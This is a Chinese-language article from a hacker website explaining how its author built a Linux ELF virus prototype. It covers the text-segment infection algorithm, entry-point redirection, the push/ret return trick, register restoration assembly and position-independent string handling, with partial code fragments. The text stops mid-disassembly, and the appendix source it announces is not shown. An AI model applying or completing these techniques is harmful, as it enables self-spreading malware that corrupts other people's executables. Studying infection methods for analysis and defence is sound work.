|
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
|
|
||||||||
|
||||||||
|
|||||
| 一个Linux病毒原型分析 | |||||
作者:grip2 文章来源:CnXHacker.Net 点击数: 更新时间:2004-12-23 ![]() |
|||||
|
内容: 1 -- 介绍 2 -- ELF Infector (ELF文件感染器) 3 -- 病毒原型的工作过程 4 -- 关键技术问题及处理 5 -- 在一个新的编译环境下的调试方法 6 -- 最后 7 -- 参考文献 8 -- 附录 - ELF文件感染工具和病毒原型源代码 一、 ** 介绍 写这篇文章的目的主要是对最近写的一个Linux病毒原型代码做一个总结, 同时向对这方面有兴趣的朋友做一个简单的介绍。 阅读这篇文章你需要一些知识,要对ELF有所了解、能够阅读一些嵌入 了汇编的C代码、了解病毒的基本工作原理。 二、 ** ELF Infector (ELF文件感染器) 为了制作病毒文件,我们需要一个ELF文件感染器,用于制造第一个带毒文件。 对于ELF文件感染技术,在Silvio Cesare的《UNIX ELF PARASITES AND VIRUS》 一文中已经有了一个非常好的分析、描述,在这方面我还没有发现可以对其进行补充的 地方,因此在这里我把Silvio Cesare对ELF Infection过程的总结贴出来,以供参考: The final algorithm is using this information is. * Increase p_shoff by PAGE_SIZE in the ELF header * Patch the insertion code (parasite) to jump to the entry point (original) * Locate the text segment program header * Modify the entry point of the ELF header to point to the new code (p_vaddr + p_filesz) * Increase p_filesz by account for the new code (parasite) * Increase p_memsz to account for the new code (parasite) * For each phdr who's segment is after the insertion (text segment) * increase p_offset by PAGE_SIZE * For the last shdr in the text segment * increase sh_len by the parasite length * For each shdr who's section resides after the insertion * Increase sh_offset by PAGE_SIZE * Physically insert the new code (parasite) and pad to PAGE_SIZE, into the file - text segment p_offset + p_filesz (original) 在Linux病毒原型中所使用的gei - ELF Infector即是根据这个原理写的。在 附录中你可以看到这个感染工具的源代码: g-elf-infector.c g-elf-infector与病毒是独立开的,其只在制作第一个病毒文件时被使用。我简单介 绍一下它的使用方法,g-elf-infector.c可以被用于任何希望--将二进制代码插入到 指定文件的文本段,并在目标文件执行时首先被执行--的用途上。g-elf-infector.c 的接口很简单,你只需要提供以下三个定义: * 存放你的二进制代码返回地址的地址,这里需要的是这个地址与代码起始 地址的偏移,用于返回到目标程序的正常入口 #define PARACODE_RETADDR_ADDR_OFFSET 1232 * 要插入的二进制代码(由于用C编写,所以这里需要以一个函数的方式提供) void parasite_code(void); * 二进制代码的结束(为了易用,这里用一个结尾函数来进行代码长度计算) void parasite_code_end(void); parasite_code_end应该是parasite_code函数后的第一个函数定义,通常应该如下表示 void parasite_code(void) { ... ... ... } void parasite_code_end(void) {} 在这里存在一个问题,就是编译有可能在编译时将parasite_code_end放在parasite_code 地址的前面,这样会导致计算代码长度时失败,为了避免这个问题,你可以这样做 void parasite_code(void) { ... ... ... } void parasite_code_end(void) {parasite_code();} 有了这三个定义,g-elf-infector就能正确编译,编译后即可用来ELF文件感染 ~grip2@linux> ./gei foo 三、** 病毒原型的工作过程 1 首先通过ELF Infector将病毒代码感染到一个ELF文件,这样就创造了第一 个带毒文件,后续的传播就由它来完成。 2 当带毒文件被执行时,会首先跳到病毒代码开始执行。 3 病毒代码开始发作,在这个原型里,病毒会直接开始传播。 4 病毒遍历当前目录下的每一个文件,如果是符合条件的ELF文件就开始感染。 5 病毒的感染过程和ELF Infector的过程类似,但由于工作环境的不同, 代码的实现也是有较大区别的。 6 目前传染对ELF文件的基本要求是文本段要有剩余空间能够容纳病毒代码, 如果无法满足,病毒会忽略此ELF。对于被感染过一次的ELF文件,文本段将不会有 剩余的空间,因此二次感染是不会发生的。 7 病毒代码执行过后,会恢复堆栈和所有寄存器(这很重要),然后跳回到 真正的可执行文件入口,开始正常的运行过程。 上面对病毒原型的工作过程的介绍也许显得千篇一律了,和我们早就熟知的 关于病毒的一些介绍没有什么区别?是的,的确是这样,原理都是类似的,关键是要看 实现。下面我们就将通过对一些技术问题的分析来了解具体的实现思路。 四、** 关键技术问题及处理 1 ELF文件执行流程重定向和代码插入 在ELF文件感染的问题上,ELF Infector与病毒传播时调用的infect_virus思路是一样的: * 定位到文本段,将病毒的代码接到文本段的尾部。这个过程的关键是要熟悉 ELF文件的格式,将病毒代码复制到文本段尾部后,能够根据需要调整文本段长度改变 所影响到的后续段(segment)或节(section)的虚拟地址。同时注意把新引入的文本段部 分与一个.setion建立关联,防止strip这样的工具将插入的代码去除。还有一点就是要 注意文本段增加长度的对齐问题,见ELF文档中的描述: p_align As ``Program Loading'' later in this part describes, loadable process segments must have congruent values for p_vaddr and p_offset, modulo the page size. * 通过过将ELF文件头中的入口地址修改为病毒代码地址来完成代码重定向: /* Modify the entry point of the ELF */ org_entry = ehdr->e_entry; ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz; 2 病毒代码如何返回到真正的ELF文件入口 方法技巧应该很多,这里采用的方法是PUSH+RET组合: __asm__ volatile ( ... "return:\n\t" "push $0xAABBCCDD\n\t" /* push ret_addr */ "ret\n" ::); 其中0xAABBCCDD处存放的是真正的程序入口地址,这个值在插入病毒代码时由感染程 序来填写。 3 堆栈和寄存器的恢复 病毒代码必须保证运行前、后的堆栈和寄存器内容完全相同,这通过增加额外的代码 来完成。 在进入时: __asm__ volatile ( "push %%eax\n\t" "push %%ecx\n\t" "push %%edx\n\t" ::); 退出时: __asm__ volatile ( "popl %%edx\n\t" "popl %%ecx\n\t" "popl %%eax\n\t" "addl $0x102c, %%esp\n\t" "popl %%ebx\n\t" "popl %%esi\n\t" "popl %%edi\n\t" "popl %%ebp\n\t" "jmp return\n" 要注意上面的代码是根据特定的编译器、编译选项来调整的,在不同的环境下如果重 新编译病毒程序,可能还需要做一些调整。 4 字符串的使用 write(1, "hello world\n", 12); 在病毒代码中这样对一个字符串直接引用是不可以的。这是对字符串的使用是一个绝 对地址引用,病毒代码在进入到一个新的宿主内后,这一绝对地址的内容是无法得到 保证的,因此在病毒代码内应该使用相对地址或间接地址进行字符串访问。 下面是Silvio Cesare的《UNIX ELF PARASITES AND VIRUS》中的一个解决办法,利用 了缓冲区溢出中shellcode的编写技术: In x86 Linux, some syscalls require the use of an absolute address pointing to initialized data. This can be made relocatable by using a common trick used in buffer overflow code. jmp A B: pop %eax ; %eax now has the address of the string . ; continue as usual . . A: call B .string \"hello\" By making a call directly proceeding the string of interest, the address of the string is pushed onto the stack as the return address. 但是在编写这个linux病毒原型代码时,我并没有使用这个方法,我尽力使代码使用 C语言的语法: char tmpfile[32] = {'/','t','m','p','/','.','g','v','i','r','u','s','\0'}; #ifndef NDEBUG char err_type[32] = {'f','i','l','e',' ','t','y','p','e',' ','n','o','t',' ', 's','u','p','p','o','r','t','e','d','\n','\0'}; char luck[32] = {'B','e','t','t','e','r',' ','l','u','c','k',' ', 'n','e','x','t',' ','f','i','l','e','\n','\0'}; #endif 在这里将字符串以字符数组的形式出现,编译之后的代码是这样: ... movb $47, -8312(%ebp) movb $116, -8311(%ebp) movb $109, -8310(%ebp) movb $112, -8309(%ebp) movb $47, -8308(%ebp) movb $46, -8307(%ebp) movb $103, -8306(%ebp) movb $118, -8305(%ebp) movb $105, -8304(%ebp) movb $114, -8303(%ebp) movb $117, -8302(%ebp) movb $115, -8301(%ebp) ... 这样带来一个负面影响就是增加了代码长度,但是适当的使用对代码长度影响并不大。 值得注意的一点是,当字符数组定义的尺寸超过了64时,在我的编译环境下,编译器 对代码进行了优化,会导致编译后代码成为: ... .section .rodata .LC0: .byte 47 .byte 116 .byte 109 .byte 112 .byte 47 .byte 46 .byte 103 .byte 118 .byte 105 .byte 114 .byte 117 .byte 115 .byte 0 ... 数据被放到了.rodata section中,这样就使得其无法随病毒代码一起进入宿主,会 造成访问失败,所以注意数组的申请尽量保持32以内,防止编译器优化。 除此之外,使用整型数组的方法也与此类似,不再赘述。 5 遭遇gcc-3.3的bug gvirus.c中有一部分的数据初始化是这样的: ... char curdir[2] = {'.', 0}; char newline = '\n'; curdir[0] = '.'; curdir[1] = 0; newline = '\n'; if ((curfd = g_open(curdir, O_RDONLY, 0)) < 0) goto out; ... 也许你会奇怪,为什么curdir和newline在已经初始化后还要重新赋值,这其中的原因 是为了绕过一个gcc的bug。 在我的编译环境下,当只做 char curdir[2] = {'.', 0}; char newline = '\n'; 这样的初始化时,反汇编代码如下: ... 0x08048cb0 0x08048cb1 0x08048cb2 0x08048cb3 0x08048cb4 0x08048cba 0x08048cbb 0x08048cbc 0x08048cbd 0x08048cbf 0x08048cc3 0x08048cc8 0x08048cca 0x08048ccc 0x08048cd0 0x08048cd3 0x08048cd5 0x08048cdd 0x08048ce1 0x08048ce3 0x08048ce9 ... 从注释可以看出,在这种情况下,curdir的初始化被放到了g_open使用其做参数之后。 当加入 curdir[0] = '.'; curdir[1] = 0; newline = '\n'; 后,反汇编代码如下: ... 0x08048cb0 0x08048cb1 0x08048cb2 0x08048cb3 0x08048cb4 0x08048cba 0x08048cbb 0x08048cbc 0x08048cbd 0x08048cbf 0x08048cc6 0x08048cca 0x080 |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| 如何分级防御针对Linux服务器 活地运用SQL Injection做数据 微软今日发布Windows Live测 微软更新Live Home 加日历和 微软报告称操作系统漏洞 今年 微软携安全厂商建统一战线 M 微软将开放Windows Live网络 Hotmail更新——Windows Liv 警惕:又一个通过 MSN传播的 Windows Live新主页类似Live |
网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
| » CnXHacker.CoM | © CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |